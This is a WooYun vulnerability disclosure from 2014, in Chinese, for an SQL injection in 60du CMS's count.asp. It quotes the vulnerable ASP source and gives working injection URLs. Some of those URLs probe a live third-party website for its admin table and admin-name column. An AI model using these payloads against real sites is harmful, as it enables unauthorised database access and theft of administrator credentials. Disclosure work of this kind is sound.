当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079011

漏洞标题:60度CMS 最新版sql注入

相关厂商:60du.net

漏洞作者: menmen519

提交时间:2014-10-13 19:04

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-12: 细节向核心白帽子及相关领域专家公开
2014-12-22: 细节向普通白帽子公开
2015-01-01: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

60度CMS 最新版sql注入

详细说明:

count.asp:

<!--#include file="inc/conn.asp"-->
<%
if id <> "" and view="ok" then
conn.execute("update cms_article set hits=hits+1 where id="&id)
response.write "document.write('"&conn.execute("select hits from cms_article where id = "&id)(0)&"');"
end if
if id<>"" and pl="ok" then
set rs = conn.execute("select plcheck from Site_Config where id=1")
if not rs.eof then
plcheck = rs("plcheck")
end if
sql = "select id from cms_comment where check = "&plcheck&" and artid="&id
set rs = conn.execute(sql)
if not rs.eof then
count = ubound(rs.getrows,2) + 1
else
count = 0
end if
response.write "document.write('<a href="&conn.execute("select site_install from Site_Config where id = 1")(0)&"Comment.asp?id="&id&" target=_blank>发表评论("&count&")</a>');"
end if
%>


这里id没有做任何处理 直接进入到sql语句里面,我们本地测试
http://localhost/count.asp?id=1111111111111%20or%20exists%20(select%20count(*)%20from%20MSysAccessObjects)%20&pl=ok

1.png


http://localhost/count.asp?id=1111111111111%20or%20exists%20(select%20count(*)%20from%20MSysAccessObjects1)%20&pl=ok

2.png


这里我们通过google 找到一个实例
http://www.kebo888.cn/count.asp?id=1111111111111%20or%20exists%20(select%20count(*)%20from%2060du_Admin)%20&view=ok
http://www.kebo888.cn/count.asp?id=1111111111111%20or%20exists%20(select%20count(AdminName)%20from%2060du_Admin)%20&view=ok
后续猜测表的字段内容就不说了

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

最新状态:

暂无